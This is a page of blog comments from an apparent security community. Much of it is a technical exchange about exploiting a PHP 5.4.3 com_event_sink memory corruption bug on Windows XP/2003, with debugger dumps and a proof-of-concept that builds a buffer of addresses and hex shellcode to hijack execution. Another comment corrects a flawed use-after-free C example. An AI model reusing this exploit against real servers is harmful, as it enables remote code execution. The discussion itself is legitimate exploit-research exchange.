Blog Comments

  1. leeladitya's Avatar
    good work rahul bhai keep it up
    Updated 02-26-2017 at 01:47 AM by leeladitya
  2. neo's Avatar
    Our good friend [S] had also suggested which is showing qmail program to be vulnerable towards ShellShock.
  3. fb1h2s's Avatar
    @liw thanks man, was usefull. I was planning to Update DNs stuffs .
  4. liyw's Avatar
    Updated 09-26-2014 at 12:19 AM by liyw
  5. cipher's Avatar
    Awsome! Great writeup Keep hacking and keep posting fb1
  6. [s]'s Avatar
    Yes XSS played main role in the Phishing. One more way , Ive seen which is floating over everyone's emails and spreading mass

    One of the following code of phishing found in some audits.

    Note : Above code is only for educational purpose.
  7. fb1h2s's Avatar
    Well while attending the talk I was wondering how I knew the talk even before, and I was like it might be another Deja Vu .
  8. cons0ul's Avatar
  9. webdevil's Avatar
    Vinnu discussed this a while ago on the forum. Go Vinnu go!

    And Thanks for the slides!
    Updated 03-08-2013 at 10:59 AM by webdevil
  10. 41.w4r10r's Avatar
    few months back we discussed something similar here
  11. fb1h2s's Avatar
    Damn sorry I dint't respond to this, will make the changes currently busy with some presentation slides .
  12. fb1h2s's Avatar
    Well in that case let be productive, we ill pick some other bug which is not public and try to make an exploit out of it what say.
  13. Rashid bhatt's Avatar
    hello brother

    We only need need to know the buffer base address , edi is not required because edi by default points towards buffer. Moreover the kind of spray you are doing is not effective, in case of this exploit the heap has to be sprayed at 4 byte boundaries and at the same time we don't know if our $buffer will be aligned at odd or even byte boundary?

    Also when you use JMP EDI trampoline definitely your heap spray will contain instructions which might have bad side effects! anyways ... lets work together on conversion of this exploit into an addresses disclosure bug!

  14. fb1h2s's Avatar
    Hi bro that was helpfull thanks for letting me know there is an alternate way to solve this .
    When I started my aim was to make the code work on Win XP, 2003[majority of php server] {irrespective of service packs obviously} platforms and when I first looked at the crash the first thought was to use a heap spray to achieve this. May be coz of the style I follow, so that u don't need to hardcode any adress and making it reliable.

    The major issue with ur method is u need to know the exact adress of the following
    2)buffers base adress

    and these two would vary even on each service packs?
    Correct me if am wrong or you are able to solve that some way, lets keep this healthy discussion up.
  15. Rashid bhatt's Avatar
    Hello ,

    See this is where the things go wrong

    ============ module php5ts.dll =====================
    102F59BD 8B06 MOV EAX,DWORD PTR DS:[ESI] << we control esi VARIANT(ESI) <<
    102F59C2 51 PUSH ECX
    102F59C3 53 PUSH EBX
    102F59C4 53 PUSH EBX
    102F59C5 56 PUSH ESI
    102F59C6 FF50 10 CALL DWORD PTR DS:[EAX+10] << this is the place we can control EIP

    Now, if we put a break-point at 0x102F59BD EDI happens to point towards $buffer variable

    EAX 00000000
    ECX 003628E8
    EDX 0110DD78
    EBX 00000000
    ESP 00C1F9F8
    EBP 00C1FA4C
    ESI 0110D410 << this is what we can control using VARIANT
    EDI 0110D410 <<< $buffer

    EIP 102F59BD php5ts.102F59BD
    C 0 ES 0023 32bit 0(FFFFFFFF)
    P 1 CS 001B 32bit 0(FFFFFFFF)
    A 0 SS 0023 32bit 0(FFFFFFFF)
    Z 1 DS 0023 32bit 0(FFFFFFFF)
    S 0 FS 0038 32bit 7FFDE000(FFF)
    T 0 GS 0000 NULL
    D 0
    O 0 LastErr ERROR_SUCCESS (00000000)
    EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
    ST0 empty 1.#QNAN00000000000000

    $vVar = new VARIANT(0x0110D410); << (this address might vary on your system ) make it as EDI is

    Now i have aligned the buffer in such a way that it will contain data in the following fashion

    $buffer = "buffer_base" . "JUNK 12 BYTES" . "buffer_base + 10(hex)" . " SHELLCODE";

    Here MOV EAX,DWORD PTR DS:[ESI] as we control ESI we can load EAX with base address of $buffer cause [$buffer] = base_addr_base

    Later it happens to call a fucntion at + 10 offset of [eax] which in our buffer alignment points towards shellcode...

    ps:Because the author this exploit has already assumed that DEP/ASLR are turned off by default on the testing machine, This exploit is not likely going to work on systems running such protections.

  16. fb1h2s's Avatar
    Thanks for sharing the code and the showing intrest in the work.

    But pardon me am not getting what ur talking about how u were able to get code execution.

    In our case

    $vVar = new VARIANT(0x0110D410); // We controll this

    is not used directly for EIP but its the [ dword ptr [esi] ] .

    Here is the debugging output form the code u shared.

    Can u share the debugging output here please.

    Thanks Again, looking forward for more fruitful discussion on this.

    (ac0.ac4): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=00372ac8 edx=0114d9e0 esi=0110d410 edi=0114f230
    eip=102f59bd esp=00c1f988 ebp=00c1f9dc iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll -
    102f59bd 8b06 mov eax,dword ptr [esi] ds:0023:0110d410=????????
    0:000> u
    102f59bd 8b06 mov eax,dword ptr [esi]
    102f59bf 8d4dd4 lea ecx,[ebp-2Ch]
    102f59c2 51 push ecx
    102f59c3 53 push ebx
    102f59c4 53 push ebx
    102f59c5 56 push esi
    102f59c6 ff5010 call dword ptr [eax+10h]
    102f59c9 8b45d4 mov eax,dword ptr [ebp-2Ch]

    My tests were done on:
    C:\wamp\www\phpbugs>php.exe -v
    PHP 5.4.3 (cli) (built: May 8 2012 00:51:31)
    Copyright (c) 1997-2012 The PHP Group
    Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
    with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans

    Winxp SP 3
  17. Rashid bhatt's Avatar
    hello brother ,

    I think you got me wrong , when i said that "you are not bypassing ASLR & DEP" i knew that the exploit was not meant for environments other than winxp/2003, i thought why spraying was necessary when we can be precise in offsets,

    anyways here is the POC without spraying

    And listen bro i believe its quite possible that this vulnerability can be turned into a address disclosure bug! We need to talk about it contact me .

    //$bu = str_repeat("B", 10);
    $buffer = "\x10\xD4\x10\x01". "aaaaaaaa" . "aaaa" . "\x24\xd4\x10\x01" ."\xfc\xbb\x9d\x12\x3c\x8d\xeb\x0c\x5e\x56\x31\x1e \x ad\x01\xc3" .
    "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x44\xf9\ x a7\x54\x02" .
    "\xda\x23\x57\x38\x90\xbb\xa9\x75\xb1\xc8\xbb\xb5\ x b1\xb9\x37" .
    "\x3e\xb3\x59\xc3\x06\x34\xe9\xad\xa6\xcf\xdb\x69\ x e9\xd7\x56" .
    "\x79\xac\xe6\x49\x82\xaf\x89\xe2\x11\x0b\x6e\x7e\ x ac\x6f\xe5" .
    "\xd4\x07\xf7\xf8\x3e\xdc\x4d\xe3\x35\xb9\x71\x12\ x a1\xdd\x45" .
    "\x5d\xbe\x16\x2e\x5c\x2e\x67\xcf\x6e\x6e\x74\x83\ x 15\xae\xf1" .
    "\xdc\xd4\xe0\xf7\xe3\x11\x15\xf3\xd8\xe1\xce\xd4\ x 6b\xfb\x84" .
    "\x7f\xb7\xfa\x71\x19\x3c\xf0\xce\x6d\x18\x15\xd0\ x 9a\x17\x21" .
    "\x59\x5d\xcf\xa3\x19\x7a\x13\xd5\x62\x30\x23\x3c\ x b1\xbc\xd6" .
    "\xb7\xfb\xd7\x96\x86\xf5\xcb\xf4\xfe\x95\xeb\x07\ x 01\x20\x56" .
    "\xf3\x45\x4d\x81\x19\xca\x35\x2d\xf9\x7f\xd2\xc0\ x fe\x7f\xdd" .
    "\x54\x45\x88\x4a\x0b\x29\xa8\xcb\xbb\x82\x9a\xe5\ x 5f\x8c\xaf" .
    "\x8a\xfa\x3e\xd8\x31\x21\xb4\x51\x2f\x7f\x37\x34\ x b4\x09\x05" .
    "\xe7\x0f\xa1\x2b\x45\xcc\x35\x37\x72\x7e\xd2\x26\ x 85\x81\xdd" .
    "\xc0\x16\x06\x7a\x30\x81\x97\x1d\x55\x13\x30\xaf\ x f0\xe0\xb3" .
    "\x1e\x21\x8e\x68\x45\xdf\x06\x73\xed\x87\x38\x54\ x ce\x5f\x74" .
    "\xc7\x48\xbe\xee\x95\x3b\xad\xce\x31\xab\x01\x2f\ x a4\x5b\x11" .
    "\x4a\x44\xf0\x90\x5d\x1c\x44\xf6\x4d\x94\xb4\xc7\ x bf\xf4\x65" .
    "\x76\x12\x06\x59\x49\x52\xa8\xa5\xfc\x5a\x49\x5a\ x fe\x5a\x49" .

    $vVar = new VARIANT(0x0110D410); // We controll this
    $vVar2 = new VARIANT(0xbadc0de); //

    com_event_sink($vVar, $vVar2 , $buffer );

  18. Rashid bhatt's Avatar

    Good article ofcourse but you made some big mistakes in your program, no offence please

    The code given above in your post about Use after free sample bug is as following

    int main(void)
    char *ch_ptr = malloc(100);
    int i;
    for (i = 0; i < 99; i++)
    ch_ptr = 'A';
    printf("%s\n", ch_ptr);



    And you say "Here at line 3 char_ptr is allocated a 100 bytes heap and later inside the for loop at line 8 the heap is deallocated. And at line 9 the de referenced pointer is called again. So this will trigger a memory corruption as follows."


    First of all

    ch_ptr = 'A'; is a Blunder!

    ch_ptr is not a char variable its a char pointer, so by doing it you are not changing the value of what ch_ptr points to but the pointer itself

    free(ch_ptr); and freeing an invalid heap or memory location will result in a crash

    again you say "And at line 9 the dereferenced pointer is called again" , but in reality you are not dereferencing the pointer , we dereferencing a pointer by dereferencing operator *. so, it should be something like *ch_ptr if its %c.
  19. fb1h2s's Avatar
    The poc was made for Winxp | 2003 environments. And I don't know why u asked that question ?. Any way the current scenario if u check the instruction it was necessary for a spray to attain code execution.

    Feel free to put up a poc with out spraying.

  20. Rashid bhatt's Avatar

    If you are not bypassing ASLR & DEP why do we need to spray?

Page 1 of 3 123 LastLast